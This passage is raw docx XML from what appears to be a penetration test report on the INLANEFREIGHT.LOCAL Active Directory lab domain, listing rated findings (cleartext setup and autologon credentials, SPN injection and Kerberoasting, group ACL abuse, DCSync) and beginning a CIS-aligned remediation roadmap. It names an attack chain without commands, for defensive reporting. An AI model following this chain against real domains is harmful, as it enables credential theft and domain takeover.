          <w:p w14:paraId="6C0F3DD6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1FC43660" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Permitted lateral movement of backupadm onto member server MS01.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="6A762658" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1438034C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="43E329BD" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Unattended Setup Answer File (unattend.xml)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7CC51B29" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30AFFC7D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exposed cleartext local administrator setup credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="41CD82F8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="51A9DD20" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7C9508B0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vulnerable Scheduled Task Service (Sysax)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7C7B2FA3" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1CDF690B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enabled local privilege escalation to NT AUTHORITY\SYSTEM on MS01.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="58B09569" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="042631E0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48540051" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Autologon Registry Cleartext Storage (LSA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="599D0821" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="784DB89F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exposed mssqladm service account password in LSA registry secrets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="3D1B9093" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0960BB7C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F052B75" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GenericWrite ACL Delegation on User Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6461162C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B9C7AAF" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Allowed targeted SPN injection on ttimmons for Kerberoasting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="52F6119E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="65861AC3" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="64BD8FFE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Weak Password Policy (RC4 Kerberoastable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5749E55A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48F0A4FB" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enabled offline brute-force cracking of ttimmons TGS hash.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="42779154" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="450EAB79" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5ED508F6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GenericAll ACL Control over Security Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2DC5B490" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="14ACC112" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Allowed ttimmons to self-add into the privileged Server Admins group.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="4146434D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="000F096E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5BE96021" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Extended Directory Replication Rights (DCSync)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2319C169" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E1D9E14" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Root Cause of Domain Compromise: Allowed Server Admins to request NTDS.DIT dumps.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F90B93D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Table 3: Summary of Root-Cause Misconfigurations and Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1F31F4" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.3 Prioritized Remediation Roadmap Aligned with CIS Benchmarks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC1A7B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To effectively remediate the identified vulnerabilities and harden INLANEFREIGHT.LOCAL, the following prioritized defensive measures are recommended:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A20CD68" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="009F4D67" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Revoke Directory Replication Rights (Immediate Critical Priority): </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4D67">
        <w:rPr>
